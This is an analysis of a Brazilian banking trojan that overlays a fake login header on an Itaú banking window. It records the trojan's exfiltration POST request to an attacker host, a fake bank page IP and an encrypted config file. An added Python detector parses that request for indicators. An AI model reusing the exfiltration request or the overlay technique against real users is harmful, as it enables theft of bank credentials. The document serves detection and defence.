
Trojan horse PSW.Banker5.AKJK Analysis

General Information:

Collected Name: fotos.exe
SIZE: 1477530 bytes
MD5: 0475fa8fac3f7bbac0d38a1b89d42e51
Packer: Thinstall

Behavior:

This malware monitors system windows and searches their titles for a set of bank-related string patterns. If a match occurs, it tries to overlay the bank site's login header with a modified one that captures account and credential data. All of this information is sent to an online database.

Description:

After execution, the trojan registers itself in the Run key of the Windows Registry. It then checks whether there is a window titled “Banco Itaú – Feito Para Você – Mozilla Firefox” and tries to overlay that window with a fake header. If the window whose title matches is not a browser, the process is terminated.

The next figure was taken after accessing the real Internet Banking site with the malware running:
[Picture 1]
At this point, the malware sample inserts a fake bank header on top of the official bank site header:
[Picture 2]
After this step, all data entered by the victim in the form fields is stored in memory and sent to the attacker's database.

The trojan then connects to an online database to insert the collected target data, such as computer, operating system and user information.

Below is an excerpt of the requests sent to the database:

POST /phps/procopspro.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Host: webcomunicaobr.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
op=TransacaoAtualizacaoVersaoAtual&servidor=willow%2Esafesecureweb%2Ecom&senha=
<censored>&usuario=compteam&base=compteam&sgdb=MYSQL&nomeexe=fotos%2Eexe&

By accessing this online database it was possible to find out that the attacker centralized the information collected by different banker applications, so the table field containing the executable name (e.g., “fotos.exe”) can be used to map which binaries are more effective.
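The check-in request above carries several stable indicators a defender can match on in proxy or IDS logs: the Indy Library User-Agent, the PHP endpoint path, the Host header and the `op=TransacaoAtualizacaoVersaoAtual` form field, plus the `nomeexe` field that names the binary doing the reporting. The following is an added example (not part of the original analysis, and not the author's tooling) that parses such a raw HTTP request, decodes the form body and reports which indicators matched together with the fields that identify the sample and its back-end database. The sample request is constructed from the excerpt above, with the password left as the page's `<censored>` placeholder; the requirement of at least two matching indicators before flagging is an assumption chosen for this example.

```python
import urllib.parse

# Constructed sample, reproducing the request excerpt from the analysis above.
# The password value is kept as the page's "<censored>" placeholder.
SAMPLE_REQUEST = (
    "POST /phps/procopspro.php HTTP/1.0\r\n"
    "Connection: keep-alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 150\r\n"
    "Host: webcomunicaobr.com\r\n"
    "Accept: text/html, */*\r\n"
    "User-Agent: Mozilla/3.0 (compatible; Indy Library)\r\n"
    "\r\n"
    "op=TransacaoAtualizacaoVersaoAtual&servidor=willow%2Esafesecureweb%2Ecom"
    "&senha=<censored>&usuario=compteam&base=compteam&sgdb=MYSQL&nomeexe=fotos%2Eexe&"
)

# Indicators taken directly from the request excerpt in the analysis.
INDICATORS = {
    "host": "webcomunicaobr.com",
    "path": "/phps/procopspro.php",
    "user_agent": "Indy Library",          # substring match on the UA header
    "op": "TransacaoAtualizacaoVersaoAtual",
}

# Assumption for this example: two or more matching indicators flag the request.
MIN_MATCHES = 2


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body).

    Header names are lower-cased so lookups are case-insensitive.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def decode_form(body):
    """Decode an application/x-www-form-urlencoded body into a dict.

    parse_qsl handles the %2E escapes and silently skips the empty pair
    left by the trailing '&' in the captured body.
    """
    return dict(urllib.parse.parse_qsl(body, keep_blank_values=True))


def inspect_request(raw):
    """Match a raw request against the banker indicators.

    Returns the matched indicator names, a verdict, and the form fields that
    identify the reporting binary and the attacker's database back-end.
    """
    method, path, headers, body = parse_http_request(raw)
    fields = decode_form(body) if method == "POST" else {}

    matched = []
    if headers.get("host") == INDICATORS["host"]:
        matched.append("host")
    if path == INDICATORS["path"]:
        matched.append("path")
    if INDICATORS["user_agent"] in headers.get("user-agent", ""):
        matched.append("user_agent")
    if fields.get("op") == INDICATORS["op"]:
        matched.append("op")

    return {
        "matched": matched,
        "verdict": "banker_checkin" if len(matched) >= MIN_MATCHES else "clean",
        "nomeexe": fields.get("nomeexe"),      # which binary is reporting in
        "db_server": fields.get("servidor"),   # MySQL host the PHP script uses
        "db_user": fields.get("usuario"),
        "db_name": fields.get("base"),
        "db_engine": fields.get("sgdb"),
    }


if __name__ == "__main__":
    for key, value in inspect_request(SAMPLE_REQUEST).items():
        print(f"{key}: {value}")
```

Run over the constructed sample, `inspect_request` reports all four indicators, the verdict `banker_checkin`, `nomeexe` = `fotos.exe` and the decoded database server `willow.safesecureweb.com`. Because the `nomeexe` field is extracted separately, the same routine lets a responder group check-ins by binary name, which is exactly the mapping the attacker's own table was being used for.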

This malware opens UDP port 1311 locally and connects to several IP addresses on HTTP or HTTPS ports.
[Picture 3]
One of these connections (https://200.196.152.202/) points to a fake credential-entry header page for a Brazilian bank, as shown below:
[Picture 4]
An input file is created in the same folder as the binary. After the malware reads the contents of this file, the file is deleted. The content appears to be encrypted, as shown below:

qe6dt1Huvv1sxeHg
qeHEsu1sx1rjx1LgBhj2D2rSnwH0Fx9OFNHUAx9SFNK1Ehr8
qe9itLPjuLrFwuz3DhzRB290DG
qeHEvvnAx1LgCw91CNrPkI3
qfvuvL9Fwuz3DhzRB290DG
qeHCx1LgvKjisLC
qe9jv7zZB86Ritq7Bh99Ehr8BNvYEhP7EwK1Ehr8ngTZA8G7A8L7EhrRAgTPDdvRC8S
qe9jv1rlxKLAx1rjrNnVB8SHndrSFNL3DhzUDxj3ENr9Atv3Dhy7A2nRAdrRAxr3DgTODgTPnwTZAW

(Thanks to Diego Bassani de Souza)

Read more here: AVG | Top Threats
